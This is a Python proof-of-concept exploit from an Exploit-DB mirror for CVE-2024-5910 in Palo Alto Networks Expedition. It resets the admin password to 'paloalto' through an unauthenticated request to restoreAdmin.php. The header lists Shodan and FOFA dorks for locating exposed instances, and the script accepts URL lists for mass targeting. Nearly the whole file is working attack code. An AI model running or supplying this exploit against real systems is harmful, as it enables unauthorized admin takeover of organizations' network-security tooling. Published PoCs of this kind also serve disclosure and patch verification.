exploit-db-mirror/exploits/multiple/webapps/52129.py

# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
# Shodan Dork: html:"expedition project"                                                      #
# FOFA Dork: "expedition project" && icon_hash="1499876150"                                   #
# Exploit Author: ByteHunter                                                                  #
# Email: 0xByteHunter@proton.me                                                               #
# Vulnerable Versions: 1.2 < 1.2.92                                                           #
# Tested on: 1.2.90.1 & 1.2.75                                                                #
# CVE : CVE-2024-5910                                                                         #
############################                                                                   #
################################################################################################

import requests
import argparse
import warnings

from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)

ENDPOINT = '/OS/startup/restore/restoreAdmin.php'

def send_request(base_url):
    url = f"{base_url}{ENDPOINT}"
    print(f"Testing URL: {url}")
    try:
        response = requests.get(url, verify=False, timeout=7)
        if response.status_code == 200:
            print("✓ Admin password restored to: 'paloalto'\n")
            print("✓ admin panel is now accessable via ==> admin:paloalto creds")
        else:
            print(f"Request failed with status code: {response.status_code}\n")
    except requests.exceptions.RequestException as e:
        print(f"Error sending request to {url}") #{e}

def main():
    parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
    parser.add_argument('-u', '--url', type=str, help='single target URL')
    parser.add_argument('-l', '--list', type=str, help='URL target list')

    args = parser.parse_args()

    if args.url:
        send_request(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as file:
                urls = file.readlines()
                for base_url in urls:
                    send_request(base_url.strip())
        except FileNotFoundError:
            print(f"File not found: {args.list}")
    else:
        print("I need a URL address with -u or a URL file list with -l.")

if __name__ == '__main__':
    main()